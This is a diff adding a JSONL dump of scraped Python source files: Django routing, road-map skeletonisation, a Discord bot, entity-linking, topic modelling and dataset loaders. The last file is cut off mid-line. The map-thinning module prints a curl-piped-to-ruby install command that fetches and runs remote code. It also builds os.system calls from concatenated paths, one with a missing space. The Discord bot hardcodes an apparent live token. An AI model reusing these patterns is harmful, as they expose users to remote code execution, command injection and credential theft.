diff --git "a/4014.jsonl" "b/4014.jsonl" new file mode 100644--- /dev/null +++ "b/4014.jsonl" @@ -0,0 +1,1173 @@ +{"seq_id":"8214752967","text":"from django.conf import settings\nfrom django.urls.conf import include, path\nfrom rest_framework.routers import DefaultRouter, SimpleRouter\n\nfrom apps.users.api import views\n\nif settings.DEBUG:\n router: DefaultRouter | SimpleRouter = DefaultRouter()\nelse:\n router = SimpleRouter()\n\napp_name = \"apps.users\"\n\nrouter.register(\"auth\", views.AuthViewSet)\nurlpatterns = router.urls\n\nurlpatterns += [\n path(\"auth/login/\", include(\"rest_social_auth.urls_jwt_pair\")),\n]\n","repo_name":"summerthe/summers_api","sub_path":"apps/users/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"38979785319","text":"# 2020, BackThen Maps \n# Coded by Remi Petitpierre https://github.com/RPetitpierre\n# For Bibliothèque nationale de France (BnF)\n\nimport cv2, thinning, os\n\nimport numpy as np\nimport pandas as pd\nimport shapefile as shp\n\nfrom skimage.measure import approximate_polygon\nfrom PIL import Image, ImageDraw\n\nfrom utils.utils import *\nfrom utils.match import toLatLon\n\nImage.MAX_IMAGE_PIXELS = 500000000\n\n\ndef skeletonize(road_network: np.ndarray, path: str = \"workshop/vectorized.png\", largest_component: bool = False):\n ''' Thinning/skeletonization of the road network image to a wired model.\n Input(s):\n road_network: black and white image of the road network (streets in white)\n path: path where the skeletonized image should be saved\n largest_component: if True, only the largest road network component will be kept\n Output(s):\n vectorized: skeletonized image\n '''\n \n assert len(road_network.shape) == 2, 'ERROR: road_network must be grayscale image'\n \n img = cv2.resize(road_network, (road_network.shape[1]//2, road_network.shape[0]//2))\n vectorized = thinning.guo_hall_thinning(img)\n vectorized[vectorized > 100] = 255\n vectorized[vectorized <= 100] = 0\n \n if largest_component:\n try:\n _, labels, stats, _ = cv2.connectedComponentsWithStats(vectorized.copy(), connectivity=8, stats=cv2.CC_STAT_AREA)\n stats = stats[1:]\n main_component = (np.argmax(stats[:,4])+1).astype('int32')\n vectorized = (labels == main_component).astype('uint8')*255\n except:\n 'Warning: Skeletonization failed to apply largest_component = True param. Skipping.'\n \n cv2.imwrite(path, vectorized)\n \n return vectorized\n\n\ndef findNodes(image: np.ndarray):\n ''' Find the nodes in the road network skeleton image.\n Input(s):\n image: skeletonized image\n Output(s):\n nodes: array of nodes coordinates (x, y)\n degree: degrees of the nodes (2=endpoint, 4=crossroads of 3 streets, 5=crossroads of 4 streets, etc.)\n addresses: directions of the crossing roads, with regard to the node\n '''\n\n img = image.copy()\n\n # Find row and column locations that are non-zero\n (rows, cols) = np.nonzero(img)\n nodes, degree, addresses = [], [], []\n\n for (r,c) in zip(rows, cols):\n if r > 0 and c > 0 and r < image.shape[0]-1 and c < image.shape[1]-1:\n # Extract an 8-connected neighbourhood\n (col_neigh, row_neigh) = np.meshgrid(np.array([c-1, c, c+1]), np.array([r-1, r, r+1]))\n\n # Cast to int to index into image\n col_neigh = col_neigh.astype('int')\n row_neigh = row_neigh.astype('int')\n\n # Convert into a single 1D array and check for non-zero locations\n pix_neighbourhood = img[row_neigh, col_neigh].ravel() != 0\n\n # If the number of non-zero locations equals 2, add this to our list of coordinates\n n_neighbours = np.sum(pix_neighbourhood)\n if (n_neighbours == 2) or (n_neighbours >= 4):\n nodes.append((r, c))\n degree.append(n_neighbours)\n direction_set = np.where(pix_neighbourhood == True)[0]\n direction_set = direction_set[direction_set != 4]\n addresses.append(direction_set)\n\n nodes = np.asarray(nodes)\n \n return nodes, degree, addresses\n\n\ndef cleanNodesEdges(df_nodes: pd.DataFrame):\n\n df = df_nodes.copy()\n\n new_addresses, new_degree = [], []\n\n for ind, address in df['address'].iteritems(): \n new_address = avoidDiagonalEdges(address)\n new_addresses.append(new_address)\n new_degree.append(len(new_address) + 1)\n\n df['address'] = new_addresses\n df['degree'] = new_degree\n \n return df\n\n\ndef avoidDiagonalEdges(address: list, direction: int = None):\n \n right, diagonal = [1, 3, 5, 7], {0: [1, 3], 2: [1, 5], 6: [3, 7], 8: [5, 7]}\n new_address = []\n \n for r in right:\n if r in address:\n new_address.append(r)\n \n for d in diagonal.keys(): \n if d in address:\n if not(diagonal[d][0] in address) and not(diagonal[d][1] in address):\n if direction != None:\n if not((8-direction) in diagonal[d]):\n new_address.append(d)\n else:\n new_address.append(d) \n \n return new_address\n\n\ndef explorePath(start_x: int, start_y: int, start_dir: int, image: np.ndarray, nodes_grid: np.ndarray):\n \n ''' Follow the path from one given start node and direction until the next node, and stores the pixels\n on the way.\n Input(s):\n start_x: start node x-coordinate\n start_y: start node y-coordinate\n start_dir: starting direction ({0, 1, 2,\n 3, -, 5,\n 6, 7, 8})\n image: skeletonized image of the road network\n nodes_grid: grid of the nodes of the skeletonized image\n Output(s):\n way: list of pixel coordinates on the way\n direction: last direction to reach the 2nd node\n nodes_grid[x, y]: degree of the arrival node\n '''\n \n def absoluteWay(x: int, y: int, way: int):\n \n if way == 0:\n x_, y_ = x-1, y-1\n elif way == 1:\n x_, y_ = x-1, y\n elif way == 2:\n x_, y_ = x-1, y+1\n elif way == 3:\n x_, y_ = x, y-1\n elif way == 5:\n x_, y_ = x, y+1\n elif way == 6:\n x_, y_ = x+1, y-1\n elif way == 7:\n x_, y_ = x+1, y\n elif way == 8:\n x_, y_ = x+1, y+1\n else:\n raise AttributeError('Parameters invalid: (' + str(x) + ',' + str(y) + ',' + str(way) + '), way \\\n should be comprised between 0 and 8, and != 4. x, y and way should be of type int.')\n\n return x_, y_\n \n def noTurnBack(direction: int):\n \n wrong_paths = []\n if direction == 0:\n wrong_paths = [5, 7]\n elif direction == 1:\n wrong_paths = [6, 8]\n elif direction == 2:\n wrong_paths = [3, 7]\n elif direction == 3:\n wrong_paths = [2, 8]\n elif direction == 5:\n wrong_paths = [0, 6]\n elif direction == 6:\n wrong_paths = [1, 5]\n elif direction == 7:\n wrong_paths = [0, 2]\n elif direction == 8:\n wrong_paths = [1, 3]\n \n return wrong_paths\n \n direction = start_dir\n x, y = start_x, start_y\n assert image[x, y] != 0, 'ERROR: start point is not white'\n end = False\n way = [(x, y)]\n \n # First iteration\n new_x, new_y = absoluteWay(x, y, direction)\n assert image[new_x, new_y] != 0, 'ERROR: 2nd point is not white'\n way.append((new_x, new_y))\n x, y = new_x, new_y\n \n wrong_paths = noTurnBack(direction)\n wrong_paths_active = True\n \n if nodes_grid[x, y]:\n end = True\n direction = 8-start_dir\n\n while not(end):\n if x > 0 and y > 0 and x < image.shape[0]-1 and y < image.shape[1]-1:\n # Extract an 8-connected neighbourhood\n (row_neigh, col_neigh) = np.meshgrid(np.array([x-1, x, x+1]), np.array([y-1, y, y+1]))\n\n # Cast to int to index into image\n col_neigh, row_neigh = col_neigh.astype('int'), row_neigh.astype('int')\n\n # Convert into a single 1D array and check for non-zero locations\n try:\n pix_neighbourhood = image[row_neigh, col_neigh].transpose().ravel() != 0\n except:\n print(x, y, image.shape, )\n raise AssertionError()\n \n # If the number of non-zero locations equals 2, add this to our list of coordinates\n n_neighbours = np.sum(pix_neighbourhood)\n direction_set = np.where(pix_neighbourhood == True)[0]\n last_ds = [wrong_paths]\n last_ds.append(direction_set)\n \n direction_set = direction_set[direction_set != 4]\n last_ds.append(direction_set)\n direction_set = direction_set[direction_set != (8-direction)]\n last_ds.append(direction_set)\n direction_set = np.asarray(avoidDiagonalEdges(direction_set, direction))\n last_ds.append(direction_set)\n \n if wrong_paths_active:\n for wrong_path in wrong_paths:\n direction_set = direction_set[direction_set != wrong_path]\n wrong_paths_active = False \n\n if len(direction_set) != 1:\n end = True\n break\n \n direction = direction_set[0]\n \n new_x, new_y = absoluteWay(x, y, direction)\n way.append((new_x, new_y))\n x, y = new_x, new_y\n\n if nodes_grid[x, y]:\n end = True\n else:\n end = True\n \n return way, direction, nodes_grid[x, y]\n\n\ndef findSegments(df_nodes: pd.DataFrame, image: np.ndarray, min_length: int = 30, return_simple_ways: bool = True):\n ''' Find all the road segments in the network. Keep the ones that are longer than a given length or non-terminal. \n Optionally, compute the Douglas-Peucker simple itinerary of each segment and return it.\n Input(s):\n df_nodes: list of nodes\n image: skeletonized image of the road network\n min_length: min segment length if the segment is terminal\n return_simple_ways: if True, compute the Douglas-Peucker simple itinerary of each segment and return it\n Output(s):\n (Optional)(simple_ways: the Douglas-Peucker simple itinerary of each segmenty)\n ways: list of segments, containing all the pixels on the way between each couple of nodes\n nodes_grid: image containing all the nodes found in the image and their degree\n '''\n \n img = image.copy()\n done, ways = [], []\n df_nodes = df_nodes.sort_values(by='degree').reset_index(drop=True)\n nodes_grid = np.zeros(image.shape)\n \n for ind, row in df_nodes[['x', 'y', 'degree']].iterrows():\n nodes_grid[row['x'], row['y']] = row['degree']\n nodes_grid = nodes_grid.astype('int')\n\n for ind, node in df_nodes.iterrows():\n for direct in node['address']:\n code = str(node['x']) + '_' + str(node['y']) + '_' + str(direct)\n if not(code in done):\n way, last_direct, degree = explorePath(start_x=node['x'], start_y=node['y'], \n start_dir=direct, image=img, nodes_grid=nodes_grid)\n if not((len(way) <= min_length) and ((node['degree'] == 2) or (degree == 2))):\n done.append(str(way[-1][0]) + '_' + str(way[-1][1]) + '_' + str(8-last_direct))\n ways.append(way)\n \n if return_simple_ways:\n simple_ways = []\n for way in ways:\n inv_way = np.asarray([np.asarray(way)[:,1], image.shape[0]-np.asarray(way)[:,0]]).transpose()\n simple_ways.append(approximate_polygon(np.asarray(inv_way), tolerance=1.6).tolist())\n\n return simple_ways, ways, nodes_grid\n \n else:\n return ways, nodes_grid\n\n\ndef thinImage(image: np.ndarray, image_name: str, export_file_path: str, exportPNG: bool = False, \n exportJSON: bool = False, exportSVG: bool = False, exportSHP: bool = False, geoloc: bool = False):\n \n assert (exportPNG or exportJSON or exportSVG or exportSHP)\n \n # Convert to B&W\n road_network = image.copy()\n road_network[road_network < 254] = 0\n road_network[road_network < 255/2] = 0\n road_network[road_network >= 255/2] = 255\n\n vectorized = skeletonize(road_network, largest_component = True)\n \n nodes, degree, addresses = findNodes(vectorized)\n\n if len(degree) < 0:\n return [], [], np.zeros((image.shape[1], image.shape[0]))\n\n df_nodes = pd.DataFrame({'x': nodes[:,0], 'y': nodes[:,1], 'degree': degree, 'address': addresses })\n df_nodes = df_nodes.sort_values(by='degree').reset_index(drop=True)\n df_nodes = cleanNodesEdges(df_nodes)\n df_nodes = df_nodes[df_nodes['degree'] != 3]\n\n if (exportJSON or exportSHP):\n simple_segments, full_segments, nodes_grid = findSegments(df_nodes, vectorized, min_length = 15, \n return_simple_ways = True)\n else:\n full_segments, nodes_grid = findSegments(df_nodes, vectorized, min_length = 15, \n return_simple_ways = False)\n simple_segments = []\n\n if exportPNG:\n toPNG(full_segments, vectorized, export_file_path)\n elif exportSVG:\n toPNG(full_segments, vectorized, os.path.join('workshop', 'thin.png'))\n\n if geoloc:\n if exportJSON:\n\n project_name = getProjectName()\n \n try: \n with open(os.path.join('save', project_name, 'match' , 'primary', image_name + '.json')) as data:\n data = json.load(data)\n\n M = np.asarray(data['M'])\n\n simple_segments_JSON = []\n for segment in simple_segments:\n s = np.asarray([2*np.asarray(segment)[:,0], image.shape[0]-(2*np.asarray(segment)[:,1])]).T\n simple_segments_JSON.append(toLatLon((s@M[:, :2]) + M[:, 2:3].transpose()).tolist())\n\n except:\n print(\"La géolocalisation de l'image {} n'a pas encore été calculée. Par conséquent, \\\nil n'est pas possible de calculer la géolocalisation de son réseau filaire\".format(image_name))\n simple_segments_JSON = simple_segments\n\n else:\n print('La géolocalisation du réseau filaire ne fonctionne que pour le format JSON actuellement.')\n else:\n simple_segments_JSON = simple_segments\n \n if exportJSON:\n with open(export_file_path.replace('png', 'json'), 'w') as outfile:\n json.dump(simple_segments_JSON, outfile)\n \n if exportSHP:\n os.makedirs(export_file_path.replace('.png', ''), exist_ok=True)\n toShapefile(simple_segments, os.path.join(export_file_path.replace('.png', ''), image_name))\n \n if exportSVG:\n print(\"\\nAvertissement: Si vous n'avez jamais utilisé cette commande, \\\ninstallez d'abord Homebrew, ImageMagick et Potrace via le terminal.\\n\")\n print('Pour installer Homebrew:\\n', \n ' /usr/bin/ruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\"')\n print('Pour installer ImageMagick:\\n', ' brew install imagemagick')\n print('Pour installer Potrace: \\n', ' brew install potrace\\n')\n \n if exportPNG:\n png_path = export_file_path\n else:\n png_path = os.path.join('workshop', 'thin.png')\n \n pnm_path = os.path.join('workshop', 'thin.pnm')\n svg_path = export_file_path.replace('png', 'svg')\n os.system('convert ' + png_path + pnm_path)\n os.system('potrace ' + pnm_path + ' -s -o ' + svg_path)\n \n return simple_segments, full_segments, nodes_grid\n\n\ndef toPNG(segments: list, vectorized: np.ndarray, out_path: str):\n ''' Save a given set of segments as a bitmap image from the road network.\n Input(s):\n segments: list of segments, containing all the pixels on the way between each couple of nodes\n vectorized: skeletonized image of the road network\n out_path: the path, where the output bitmap image should be save\n '''\n \n canvas = (np.ones(vectorized.shape)*255).astype('uint8')\n cv2.imwrite('workshop/canvas.png', canvas);\n bitmap = Image.open('workshop/canvas.png')\n draw = ImageDraw.Draw(bitmap)\n\n for segment in segments:\n coords = []\n for point in segment:\n coords.append((point[1], point[0]))\n \n draw.line(coords, fill = 'black', width=0)\n\n bitmap.save(out_path)\n\n\ndef toShapefile(simple_ways, out_path):\n \n w = shp.Writer(out_path)\n w.field('DeletionFlag', 'C', 1, 0)\n w.field('gid', 'N', 11, 0)\n w.field('streetname', 'C', 41, 0)\n w.field('note', 'C', 32, 0)\n \n for i in range(len(simple_ways)):\n w.line([simple_ways[i]])\n w.record('01', i, '', '')\n w.close()\n\n","repo_name":"BnF-jadis/projet","sub_path":"utils/thin.py","file_name":"thin.py","file_ext":"py","file_size_in_byte":16470,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"41809000708","text":"import discord\nfrom discord.ext.commands import Bot\n\n\napp_id = '985188238077616148'\npubkey = 'cc4b986d7c0797b2d05d2181949df5c69a35de95a4e0c82089dcacc0157238bb'\ntoken = 'OTg1MTg4MjM4MDc3NjE2MTQ4.GpCZAy.bBAvcMuX1Tp2Z39-HpiL52ymO0WC2eohC-uIt0'\n\n\nclass KlugBot(Bot):\n async def on_ready(self):\n print('Logged on as {0}!'.format(self.user))\n\n async def on_command_error(self, context, exception):\n print('on_command_error')\n print(context)\n print(exception)\n\n\nintents = discord.Intents(messages=True)\nbot = KlugBot(command_prefix='++', intents=intents)\n\n\n@bot.command(name='bal', description='Get your balance')\nasync def balance(ctx, name: str):\n print(f'balance: {name}')\n\n\nbot.run(token)\n","repo_name":"reformy/klug","sub_path":"klug_web/discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21008183149","text":"#!/usr/bin/env python\nfrom .process import Process\nfrom ..util import spanset_insert\n\nfrom nel import logging\nlog = logging.getLogger()\n\nclass Resolver(Process):\n \"\"\" Assigns resolutions to chains in a document \"\"\"\n @classmethod\n def iter_options(cls):\n yield FeatureRankResolver\n yield GreedyOverlapResolver\n\nclass FeatureRankResolver(Resolver):\n \"\"\" Ranks candidates and resolves nils via previously computed feature values \"\"\"\n def __init__(self, ranking_feature, resolving_feature = None, resolving_threshold = 0.5):\n self.ranking_feature = ranking_feature\n self.resolving_feature = resolving_feature\n self.resolving_threshold = resolving_threshold\n\n def __call__(self, doc):\n for m in doc.chains:\n m.resolution = None\n if m.candidates:\n top_candidate = sorted(m.candidates, key=lambda c: c.features[self.ranking_feature], reverse=True)[0]\n if not self.resolving_feature or top_candidate.features[self.resolving_feature] > self.resolving_threshold:\n m.resolution = top_candidate\n return doc\n\nclass GreedyOverlapResolver(Resolver):\n def __init__(self, feature):\n self.feature = feature\n\n def __call__(self, doc):\n \"\"\" Resolve overlapping mentions by taking the highest scoring mention span \"\"\"\n # tracks set of disjoint mention spans in the document\n span_indicies = []\n\n non_nils = (m for m in doc.chains if m.resolution)\n nils = (m for m in doc.chains if not m.resolution)\n\n for chain in sorted(non_nils, key=lambda ch: ch.resolution.features[self.feature], reverse=True):\n mentions = []\n for m in sorted(chain.mentions,key=lambda m:len(m.text),reverse=True):\n # only resolve this link if its mention span doesn't overlap with a previous insert\n if spanset_insert(span_indicies, m.begin, m.end - 1):\n mentions.append(m)\n chain.mentions = mentions\n\n for chain in nils:\n mentions = []\n for m in sorted(chain.mentions, key=lambda m: len(m.text), reverse=True):\n if spanset_insert(span_indicies, m.begin, m.end - 1):\n mentions.append(m)\n chain.mentions = mentions\n\n return doc\n","repo_name":"andychisholm/nel","sub_path":"nel/process/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"52"} +{"seq_id":"28324722126","text":"import csv\n\ndbpediaPrefix = ''\t\t# Remove '/wiki/' from link and create dbpedia link\n\t\tname = row['Name']\n\t\tcountries[link] = {'name': name, 'alternatives': []}\n\n# Parse transitive links file one line at a time\nwith open('transitive-redirects_en.ttl', 'rb') as linksfile:\n\tfor line in linksfile:\n\t\titems = line.split()\n\t\t\n\t\tpossibleCountry = items[2]\t\t# Extract possible country link\n\t\t\n\t\tif possibleCountry in countries:\n\t\t\talt = items[0][len(dbpediaPrefix):][:-1]\n\t\t\talt = alt.replace(\"_\", \" \")\n\t\t\tcountries[possibleCountry]['alternatives'].append(alt)\n\t\t\t\n# Output csv file of countries and alternatives\nwith open('country-names-cross-ref.csv', 'wb') as f:\n\twriter = csv.writer(f)\n\t\n\t# Write out main lookup table\n\tfor country, info in sorted(countries.items()):\n\t\tfor alt in info['alternatives']:\n\t\t\trow = [alt, info['name']]\n\t\t\twriter.writerow(row)\n\n\t# Hacks for special cases not included in dbpedia\n\trow = ['Burma', 'Myanmar']\n\twriter.writerow(row)\n\trow = ['Cape Verde', 'Cabo Verde']\n\twriter.writerow(row)\n","repo_name":"aaronschiff/country-names","sub_path":"disambiguate.py","file_name":"disambiguate.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"39086438259","text":"import os\n\nimport librosa\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\nfrom utils import preemphasis\n\n\ndef read_raw_audio(audio, sample_rate=16000):\n if isinstance(audio, str):\n wave, _ = librosa.load(os.path.expanduser(audio), sr=sample_rate, mono=True)\n elif isinstance(audio, bytes):\n wave, sr = sf.read(io.BytesIO(audio))\n if wave.ndim > 1: wave = np.mean(wave, axis=-1)\n wave = np.asfortranarray(wave)\n if sr != sample_rate:\n wave = librosa.resample(wave, sr, sample_rate)\n elif isinstance(audio, np.ndarray):\n if audio.ndim > 1: ValueError(\"input audio must be single channel\")\n return audio\n else:\n raise ValueError(\"input audio must be either a path or bytes\")\n return wave\n\n\nclass AudioSource:\n def __init__(self, input_path):\n self.input_path = input_path\n self.filenames = os.listdir(input_path)\n\n def create(self):\n def _gen_data():\n for filename in self.filenames:\n path = os.path.join(self.input_path, filename)\n signal = read_raw_audio(path)\n noisy_w = preemphasis(signal)\n yield filename, signal\n\n dataset = tf.data.Dataset.from_generator(_gen_data, output_types=(tf.string, tf.float32))\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n","repo_name":"speech-denoising/id-segan","sub_path":"speech_enhancement_demo/audio_source.py","file_name":"audio_source.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10799904663","text":"import gensim\nfrom gensim.utils import tokenize\nfrom gensim import models\nfrom gensim.corpora.textcorpus import TextCorpus\nimport os, string, csv, numpy,gc,itertools\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer, TfidfVectorizer\nfrom pylab import *\nfrom sys import getsizeof\n#from nltk import clean_html\n#from nltk import bigrams\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom nltk.stem.snowball import SnowballStemmer\nfrom scipy import dot, linalg, mat\nimport xml.etree.ElementTree as ET\nimport os\nfrom Util import clean\nfrom scipy.stats import pearsonr\n\nclass TopicModels:\n\n\tdef __init__(self, input_path):\n\t\tself.topics = 100\n\t\tfiles = [input_path+f for f in os.listdir(input_path) if f.endswith('.xml')]\n\t\tmycorpus = MyCorpus(files)\n\n\t\tself.seen_documents = []\n\t\tfor document in mycorpus:\n\t\t\tself.seen_documents.append(document)\n\n\t\tself.lda_model = models.LdaModel(mycorpus, num_topics = self.topics, eval_every = 5)\n\n\t\tgroup_corpora = []\n\t\tself.group_topics = []\n\t\tfor label, list in self.make_doc_dict(files).iteritems():\n\t\t\tgroup_corpora.append(MyCombCorpus((list,files)))\n\n\t\tfor corp in group_corpora:\n\t\t\tfor doc in corp:\n\t\t\t\tvector = [0]*self.topics\n\t\t\t\tthis_topics = self.lda_model[doc]\n\t\t\t\tfor tuple in this_topics:\n\t\t\t\t\tvector[tuple[0]]=tuple[1]\n\t\t\t\tself.group_topics.append(vector)\n\n\tdef get_sim_seen(self, index):\n\t\tret_sims = []\n\t\tp = self.lda_model[self.seen_documents[index]]\n\t\tvector = [0]*self.topics\n\t\tfor tuple in p:\n\t\t\tvector[tuple[0]]=tuple[1]\n\t\tp = vector\n\t\t\n\t\tfor q in self.group_topics:\n\t\t\t'''\n\t\t\tsim = numpy.dot(p, q) / (numpy.sqrt(numpy.dot(p, p)) * numpy.sqrt(numpy.dot(q, q)))\n\t\t\tret_sims.append(sim)\n\t\t\t'''\n\t\t\t'''\n\t\t\tp = np.asarray(p, dtype=np.float)\n \t\tq = np.asarray(q, dtype=np.float)\n \t\t\t\n \t\tret_sims.append(np.sum(np.where(p != 0, p * np.log(p / q), 0)))\n\t\t\t'''\n\t\t\tret_sims.append(pearsonr(p,q)[0])\n\n\t\treturn ret_sims\n\n\tdef get_sim_unseen(self, file):\n\t\tret_sims = []\n\t\tmycorpus = MyCorpus([file])\n\t\tdocument = []\n\t\tfor doc in mycorpus:\n\t\t\tdocument.append(doc)\n\t\tp = self.lda_model[document[0]]\n\t\tvector = [0]*self.topics\n\t\tfor tuple in p:\n\t\t\tvector[tuple[0]]=tuple[1]\n\t\tp = vector\n\t\tfor q in self.group_topics:\n\t\t\t'''\n\t\t\tsim = numpy.dot(p, q) / (numpy.sqrt(numpy.dot(p, p)) * numpy.sqrt(numpy.dot(q, q)))\n\t\t\tret_sims.append(sim)\n\t\t\t'''\n\t\t\tret_sims.append(pearsonr(p,q)[0])\n\t\t\t\n\t\treturn ret_sims\n\n\tdef make_doc_dict(self, files):\n\t\tdoc_labels = dict()\n\n\t\tindex = 0\n\t\tfor file in files:\n\t\t\ttree = None\n\t\t\ttry:\n\t\t\t\ttree = ET.parse(file)\n\t\t\texcept ET.ParseError:\n\t\t\t\tindex += 1\n\t\t\t\tcontinue\n\t\t\troot = tree.getroot()\n\t\t\tage = root.get('age_group')\n\t\t\tgender = root.get('gender')\n\t\t\tlabel = age + \" \" + gender\n\n\t\t\tif not label in doc_labels:\n\t\t\t\tdoc_labels[label] = []\n\t\t\tif not age in doc_labels:\n\t\t\t\tdoc_labels[age] = []\n\t\t\tif not gender in doc_labels:\n\t\t\t\tdoc_labels[gender] = []\n\n\t\t\tdoc_labels[label].append(index)\n\t\t\tdoc_labels[age].append(index)\n\t\t\tdoc_labels[gender].append(index)\n\t\t\tindex+=1\n\n\t\treturn doc_labels\n\nclass MyCorpus(gensim.corpora.TextCorpus): \n\n\tdef get_texts(self): \n\t\tfor filename in self.input:\n\t\t\troot = ET.fromstring(open(filename).read())\n\t\t\tlang = root.attrib['lang'].lower()\n\t\t\tgenre = root.attrib['type']\n\t\t\ttree = ET.ElementTree(root)\n\t\t\tyield tokenize(clean(open(filename).read(),lang,genre,tree))\n\nclass MyCombCorpus(gensim.corpora.TextCorpus): \n\n\tdef get_texts(self): \n\t\ttext = \"\"\n\t\tfor index in self.input[0]:\n\t\t\troot = ET.fromstring(open(self.input[1][index]).read())\n\t\t\tlang = root.attrib['lang'].lower()\n\t\t\tgenre = root.attrib['type']\n\t\t\ttree = ET.ElementTree(root)\n\t\t\tstring = clean(open(self.input[1][index]).read(),lang,genre,tree)\n\t\t\ttext += string\n\t\tyield tokenize(text)","repo_name":"thejamesmarq/UWT-PAN","sub_path":"TopicFeatureExtractor.py","file_name":"TopicFeatureExtractor.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27256706135","text":"# coding=utf-8\nimport csv\nimport enum\nimport os\nimport os.path\nimport shutil\nimport zipfile\nfrom enum import Enum\nfrom functools import reduce\nfrom typing import Type, List, Tuple, Union\nfrom urllib.request import urlretrieve\n\nimport torch\nfrom torch.utils import data\n\nfrom lang import AbstractVocabulary\n\n\nclass E2ESet(Enum):\n TRAIN = enum.auto()\n DEV = enum.auto() # tuning\n TEST = enum.auto() # NO tuning\n ALL_IN_ONE = enum.auto()\n\n\nclass E2E(data.Dataset):\n \"\"\"`E2E `_ Dataset.\n\n Args:\n root (string): Root directory of dataset where ``processed/train.pt``, ``processed/dev.pt``\n and ``processed/test.pt`` exist.\n which_set (E2ESet): Determines which of the subsets to use.\n \"\"\"\n _url = 'https://github.com/tuetschek/e2e-dataset/releases/download/v1.0.0/e2e-dataset.zip'\n\n _csv_folder = 'csv'\n _train_csv = 'trainset.csv'\n _dev_csv = 'devset.csv'\n _test_csv = 'testset.csv'\n _all_in_one_csv = 'all_in_one.csv'\n\n _train_file = 'train.pt'\n _dev_file = 'dev.pt'\n _test_file = 'test.pt'\n _all_in_one_file = 'all_in_one.pt'\n _vocabulary_file = 'vocabulary.pt'\n\n def __init__(self, root, which_set: E2ESet, vocabulary_class: Type[AbstractVocabulary]):\n super(E2E, self).__init__()\n self.root = os.path.realpath(os.path.expanduser(root))\n self.which_set = which_set\n self.processed_folder = vocabulary_class.__name__\n\n if _contains_all(os.path.join(self.root, self.processed_folder),\n [self._train_file, self._dev_file, self._test_file, self._vocabulary_file]):\n with open(os.path.join(self.root, self.processed_folder, self._vocabulary_file), 'rb') as f:\n self.vocabulary = torch.load(f)\n\n options = {\n E2ESet.TRAIN: self._train_file,\n E2ESet.DEV: self._dev_file,\n E2ESet.TEST: self._test_file,\n E2ESet.ALL_IN_ONE: self._all_in_one_file\n }\n self.mr, self.ref = self._load_from_file(options[which_set])\n else:\n print('The dataset does not exist locally!')\n self.vocabulary = vocabulary_class()\n folder = self._download()\n self._process(folder)\n\n def __getitem__(self, index) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (mr, ref)\n \"\"\"\n return self.mr[index], self.ref[index]\n\n def __setitem__(self, key, value):\n self.mr[key] = value[0]\n self.ref[key] = value[1]\n\n def __len__(self) -> int:\n return len(self.mr)\n\n def __repr__(self) -> str:\n fmt_str = 'Dataset {}\\n'.format(self.__class__.__name__)\n fmt_str += '\\tNumber of instances: {}\\n'.format(self.__len__())\n fmt_str += '\\tSet type: {}\\n'.format(self.which_set.name.lower())\n fmt_str += '\\tRoot Location: {}\\n'.format(self.root)\n return fmt_str\n\n def _download(self):\n \"\"\"Download and process the E2E data.\"\"\"\n csv_folder = os.path.join(self.root, self._csv_folder)\n if _contains_all(csv_folder, files=[self._train_csv, self._dev_csv, self._test_csv, self._all_in_one_csv]):\n # No need to download again\n return os.path.join(self.root, self._csv_folder)\n\n # Clean before download\n try:\n shutil.rmtree(os.path.join(self.root))\n except FileNotFoundError:\n # That's ok\n pass\n os.makedirs(csv_folder)\n\n print('Downloading {}'.format(self._url))\n zip_path = os.path.join(self.root, 'e2e-dataset.zip')\n urlretrieve(self._url, zip_path)\n\n print('Extracting zip archive')\n with zipfile.ZipFile(zip_path) as zip_f:\n zip_f.extractall(self.root)\n\n # Rename folder\n os.rename(os.path.join(self.root, 'e2e-dataset'), csv_folder)\n\n # Delete/rename files\n os.remove(os.path.join(csv_folder, 'README.md'))\n os.remove(os.path.join(csv_folder, 'testset.csv'))\n os.rename(os.path.join(csv_folder, 'testset_w_refs.csv'),\n os.path.join(csv_folder, self._test_csv))\n\n # Create all_in_one.csv\n all_in_one_name = os.path.join(csv_folder, self._all_in_one_csv)\n seen = set() # set for fast O(1) amortized lookup\n with open(all_in_one_name, 'w') as all_in_one:\n all_in_one.write('md, ref\\n')\n for file in [self._train_csv, self._dev_csv, self._test_csv]:\n with open(os.path.join(csv_folder, file), 'r') as in_file:\n next(in_file)\n for line in in_file:\n if line not in seen:\n seen.add(line)\n all_in_one.write(line)\n\n os.remove(zip_path)\n return csv_folder\n\n def _load_from_file(self, src_file):\n src_data = torch.load(\n os.path.join(self.root, self.processed_folder, src_file))\n return [list(z) for z in zip(*src_data)]\n\n def _process(self, csv_folder):\n # Extract strings from CSV\n train_mr, train_ref = _extract_mr_ref(os.path.join(csv_folder, self._train_csv))\n dev_mr, dev_ref = _extract_mr_ref(os.path.join(csv_folder, self._dev_csv))\n test_mr, test_ref = _extract_mr_ref(os.path.join(csv_folder, self._test_csv))\n all_in_one_mr, all_in_one_ref = _extract_mr_ref(os.path.join(csv_folder, self._all_in_one_csv))\n\n # Encode MR, REF as tensors and save them\n print('Encoding and saving examples')\n os.makedirs(os.path.join(self.root, self.processed_folder))\n\n print('\\ttrain set')\n train_list = 